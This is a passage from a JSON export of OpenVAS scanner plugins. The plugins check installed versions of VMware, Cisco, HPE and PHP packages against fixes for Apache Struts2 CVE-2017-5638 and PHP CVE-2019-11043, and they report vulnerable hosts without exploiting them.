script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n script_tag(name:\"insight\", value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:01", "description": "HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "openvas", "title": "HPE Universal CMDB Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hpe_universal_cmdb_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# HPE Universal CMDB Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:hp:universal_cmbd_foundation';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106736\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-10 12:58:34 +0200 (Mon, 10 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"HPE Universal CMDB Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_hpe_universal_cmdb_detect.nasl\");\n script_mandatory_keys(\"HP/UCMDB/Installed\");\n\n script_tag(name:\"summary\", value:\"HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A potential security vulnerability in Jakarta Multipart parser in Apache\nStruts has been addressed in HPE Universal CMDB. This vulnerability could be remotely exploited to allow code\nexecution via mishandled file upload.\");\n\n script_tag(name:\"affected\", value:\"HP Universal CMDB Foundation Software v10.22 CUP5\");\n\n script_tag(name:\"solution\", value:\"HPE has made mitigation information available to resolve the vulnerability\nfor the impacted versions of HPE Universal CMDB.\");\n\n script_xref(name:\"URL\", value:\"https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"10.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-06T12:10:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-11-04T00:00:00", "type": "openvas", "title": "Fedora Update for php FEDORA-2019-7bb07c3b02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2019-11-04T00:00:00", "id": "OPENVAS:1361412562310876962", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876962", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876962\");\n script_version(\"2019-11-04T08:05:52+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-04 08:05:52 +0000 (Mon, 04 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-04 03:21:15 +0000 (Mon, 04 Nov 2019)\");\n script_name(\"Fedora Update for php FEDORA-2019-7bb07c3b02\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-7bb07c3b02\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FSNBUSPKMLUHHOADROKNG5GDWDCRHT5M\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the FEDORA-2019-7bb07c3b02 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language. PHP attempts to make it\neasy for developers to write dynamically generated web pages. PHP also\noffers built-in database integration for several commercial and\nnon-commercial database management systems, so writing a\ndatabase-enabled webpage with PHP is fairly simple. The most common\nuse of PHP coding is probably as a replacement for CGI scripts.\n\nThe php package contains the module (often referred to as mod_php)\nwhich adds support for the PHP language to Apache HTTP Server.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~7.3.11~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:54:22", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-11-10T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for php7 (openSUSE-SU-2019:2457-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852763", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852763", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852763\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-10 03:00:50 +0000 (Sun, 10 Nov 2019)\");\n script_name(\"openSUSE: Security Advisory for php7 (openSUSE-SU-2019:2457-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2457-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-11/msg00014.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7'\n package(s) announced via the openSUSE-SU-2019:2457-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for php7 fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-11043: Fixed possible remote code execution via env_path_info\n underflow in fpm_main.c (bsc#1154999).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-2457=1\");\n\n script_tag(name:\"affected\", value:\"'php7' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7\", rpm:\"apache2-mod_php7~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7-debuginfo\", rpm:\"apache2-mod_php7-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7\", rpm:\"php7~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath\", rpm:\"php7-bcmath~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath-debuginfo\", rpm:\"php7-bcmath-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2\", rpm:\"php7-bz2~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2-debuginfo\", rpm:\"php7-bz2-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar\", rpm:\"php7-calendar~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar-debuginfo\", rpm:\"php7-calendar-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype\", rpm:\"php7-ctype~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype-debuginfo\", rpm:\"php7-ctype-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl\", rpm:\"php7-curl~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl-debuginfo\", rpm:\"php7-curl-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba\", rpm:\"php7-dba~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba-debuginfo\", rpm:\"php7-dba-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debuginfo\", rpm:\"php7-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debugsource\", rpm:\"php7-debugsource~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-devel\", rpm:\"php7-devel~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom\", rpm:\"php7-dom~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom-debuginfo\", rpm:\"php7-dom-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-embed\", rpm:\"php7-embed~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-embed-debuginfo\", rpm:\"php7-embed-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant\", rpm:\"php7-enchant~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant-debuginfo\", rpm:\"php7-enchant-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif\", rpm:\"php7-exif~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif-debuginfo\", rpm:\"php7-exif-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi\", rpm:\"php7-fastcgi~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi-debuginfo\", rpm:\"php7-fastcgi-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo\", rpm:\"php7-fileinfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo-debuginfo\", rpm:\"php7-fileinfo-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird\", rpm:\"php7-firebird~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird-debuginfo\", rpm:\"php7-firebird-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm\", rpm:\"php7-fpm~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm-debuginfo\", rpm:\"php7-fpm-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp\", rpm:\"php7-ftp~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp-debuginfo\", rpm:\"php7-ftp-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd\", rpm:\"php7-gd~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd-debuginfo\", rpm:\"php7-gd-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext\", rpm:\"php7-gettext~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext-debuginfo\", rpm:\"php7-gettext-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp\", rpm:\"php7-gmp~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp-debuginfo\", rpm:\"php7-gmp-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv\", rpm:\"php7-iconv~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv-debuginfo\", rpm:\"php7-iconv-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl\", rpm:\"php7-intl~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl-debuginfo\", rpm:\"php7-intl-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json\", rpm:\"php7-json~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json-debuginfo\", rpm:\"php7-json-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap\", rpm:\"php7-ldap~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap-debuginfo\", rpm:\"php7-ldap-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring\", rpm:\"php7-mbstring~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring-debuginfo\", rpm:\"php7-mbstring-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql\", rpm:\"php7-mysql~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql-debuginfo\", rpm:\"php7-mysql-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc\", rpm:\"php7-odbc~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc-debuginfo\", rpm:\"php7-odbc-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache\", rpm:\"php7-opcache~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache-debuginfo\", rpm:\"php7-opcache-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl\", rpm:\"php7-openssl~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl-debuginfo\", rpm:\"php7-openssl-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl\", rpm:\"php7-pcntl~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl-debuginfo\", rpm:\"php7-pcntl-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo\", rpm:\"php7-pdo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo-debuginfo\", 